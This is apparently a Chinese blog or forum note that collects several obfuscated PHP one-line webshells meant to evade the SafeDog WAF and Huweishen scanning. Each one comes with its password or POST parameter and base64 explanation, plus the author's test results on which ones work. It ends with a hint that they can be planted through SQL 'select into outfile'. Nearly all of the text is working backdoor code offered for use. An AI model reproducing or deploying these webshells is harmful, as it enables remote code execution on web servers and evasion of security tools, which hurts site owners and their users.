参考：整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)

其中，第一个上面的一句话木马是：

if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content));
<O>com=settoken&content=ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7</O>
密码：page
其中，settoken的md5值是791dc312b38016ef998c1c146104cd5a，eval($_POST['page']);Base64编码为：“ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7”

第一个一句话是：

<?php  $mt="mFsKCleRfU"; $ojj="IEBleldle"; $hsa="E9TVFsnd2VuJ10p"; $fnx="Ow=="; $zk = str_replace("d","","sdtdrd_redpdldadcde"); $ef = $zk("z", "", "zbazsze64_zdzeczodze"); $dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); $zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); $zvm(); ?> 
密码：wen
不知如何解释

第二个一句话是：

    <?php   
    @$a = $_POST['x'];   
    if(isset($a)){   
    @preg_replace("/(.∗)/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));   
    }   
    ?>  
其中，[@eval(base64_decode($_POST[z0]));]base64编码后是“W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=”

但是第二句一句话我使用不成功，不知哪错了。

第三个一句话是：

<?php   
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}?>
<O>n985de9=QGV2YWwoJF9QT1NUWzBdKTs=</O>
其中，@eval($_POST[0]);base64编码后是"QGV2YWwoJF9QT1NUWzBdKTs="

第四个一句话是：但不过狗，护卫神检测无木马

<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>
其中$_uU=chr，$cC=eval($_POST[1]);，$_fF=create_function

经检测只有第二句不成功。

应该都可以select into outfile